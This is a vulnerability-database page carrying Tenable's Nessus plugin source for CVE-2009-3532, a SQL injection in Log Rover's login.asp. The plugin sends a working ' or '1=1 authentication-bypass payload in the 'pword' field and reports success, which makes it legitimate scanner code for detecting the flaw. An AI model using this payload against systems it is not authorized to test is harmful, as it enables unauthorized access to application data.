Lucene search
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.LOGROVER_PWORD_SQL_INJECTION.NASLHistoryJul 20, 2009 - 12:00 a.m.
Log Rover pword Parameter SQL Injection
2009-07-2000:00:00
This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.
www.tenable.com
27
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
0.002
Percentile
61.3%
The remote host is running Log Rover, an ASP application for analyzing web server log files.
The web interface included with the version of Log Rover installed on the remote host fails to sanitize user-supplied input to the ‘pword’ parameter of the ‘login.asp’ script before using it to construct database queries. An unauthenticated attacker may be able to exploit this issue to manipulate database queries, leading to disclosure of sensitive information or attacks against the underlying database.
Note that the ‘uname’ parameter is also likely to be similarly affected, although Nessus has not checked for that.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(40331);
script_version("1.13");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-3532");
script_bugtraq_id(43600);
script_xref(name:"SECUNIA", value:"35821");
script_name(english:"Log Rover pword Parameter SQL Injection");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an ASP script that is prone to a SQL
injection attack.");
script_set_attribute(attribute:"description", value:
"The remote host is running Log Rover, an ASP application for analyzing
web server log files.
The web interface included with the version of Log Rover installed on
the remote host fails to sanitize user-supplied input to the 'pword'
parameter of the 'login.asp' script before using it to construct
database queries. An unauthenticated attacker may be able to exploit
this issue to manipulate database queries, leading to disclosure of
sensitive information or attacks against the underlying database.
Note that the 'uname' parameter is also likely to be similarly
affected, although Nessus has not checked for that.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/504869/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(89);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/07/20");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:logrover:logrover");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_keys("www/ASP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
port = get_http_port(default:80);
if (!can_host_asp(port:port)) exit(0, "Web server does not support ASP scripts.");
user = SCRIPT_NAME;
pass = string(unixtime(), "' or '1=1");
# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/logrover", "/logs", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
# Make sure the script exists.
url = string(dir, "/login.asp");
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail: 1);
# If so...
if (
(
'set our base logrover path' >< res[2] ||
'Logrover puts you in touch' >< res[2]
) &&
'input name="uname"' >< res[2] &&
'input name="pword"' >< res[2]
)
{
# Try to exploit the issue to bypass authentication.
postdata = string(
"uname=", user, "&",
"pword=", urlencode(str:pass)
);
res = http_send_recv3(
port : port,
method : 'POST',
item : url,
data : postdata,
content_type: "application/x-www-form-urlencoded",
exit_on_fail: 1
);
# There's a problem if we're logged in.
if ("top.location = 'index1.asp'</script" >< res[2])
{
set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);
if (report_verbosity > 0)
{
report = string(
"\n",
"Nessus was able to gain access using the following information :\n",
"\n",
" URL : ", build_url(port:port, qs:url), "\n",
" User : ", user, "\n",
" Password : ", pass, "\n"
);
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
}
exit(0, "The host is not affected.");
Related
cvelist
cvelist
CVE-2009-3532
2009-10-02 19:00:00
prion
prion
Sql injection
2009-10-02 19:30:00
nvd
nvd
CVE-2009-3532
2009-10-02 19:30:00
cve
cve
CVE-2009-3532
2009-10-02 19:30:00
openvas
openvas
LogRover <= 2.3.3 SQLi Vulnerability - Active Check
2009-10-12 00:00:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
0.002
Percentile
61.3%
Related for LOGROVER_PWORD_SQL_INJECTION.NASL